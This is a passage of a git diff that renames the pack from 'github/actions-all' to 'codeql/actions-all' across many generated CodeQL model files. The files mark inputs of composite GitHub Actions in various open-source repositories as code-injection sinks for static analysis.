1a99c3773de..a638ceae55c 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index e3cf5db0f15..eb67c35e5f5 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 67866c4f904..abfb5157d3b 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 2317aa06ae2..f0c79816026 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index baf9c55ff18..5618781b68d 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 583be58ecd2..b1a2d8e4c36 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index e8250232853..f9b39981ab8 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index d3172c56667..1c90c92ca21 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index 7c1f9dac6bb..25f194e823a 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index c77798c1022..2f1481c9c55 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 3035324bee0..67a1836e826 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index dd208976fc5..917bd6b0307 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 63f111f3e83..98190bffee4 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index c330ca64c08..4916ce713d7 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 6b67c69e6e3..e015387a96d 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 135bb4baa8b..b9c1ff99ab3 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index c201386cf93..e8cde1a082f 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 5e39d3f6c5f..1f5bd390369 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9a9f865b0db..2097e02a48a 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 5c877a87d68..131b59e4f42 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 6e9e8363290..2b6604f4bce 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f0e62cdaec1..028fac59db9 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b1158922636..e188c7fb160 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 78c1a396056..fe09708380b 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index 75c257f39ae..430d128f1a0 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4d19b3ec0af..ecfd41e15dc 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b8bdc7276fb..b334b14eb37 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 220dbb58e02..936a44a214b 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 1992cbf4696..c116f45a7df 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 02c01196842..f8438e902c6 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 50af2e33e16..dc392c76263 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 679b362ba3f..0e7876a64fe 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 8e11db68c85..ccad63033af 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index deed2d12573..138ced8ab04 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 353cb30683b..20493280565 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 25522a67b69..a0d3adcc3d2 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index c545ad6844e..7db33e6e72c 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 941710eb0fe..c4fca4427ec 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 75b744fc036..09d2beb8947 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 7a4ea3514ba..bd5de74fa09 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 25a25d085ad..5b46de73fc2 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 23bd58d66cb..970fd7bc1f1 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 1849ad0e2f5..af46895fa51 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index c4861c77842..98ef93128eb 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b11931b5408..8d4820efeb7 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 1b3fffbe869..44f0c6dce8f 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index df6f6088087..d874137e497 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 89c10bd95c2..2ec8442b1cf 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index 4a471b5a97c..046bb764a1d 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 9f2448a6d75..dcd8a2df02c 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index dc8a362dc96..238d675e5b7 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index a1f2ccb164e..c6f83e458bd 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 303f9d56cb2..8a10734bd64 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 2f28cf86431..770554c8b9d 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index efbcceb48f5..fb0631e0bbb 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - 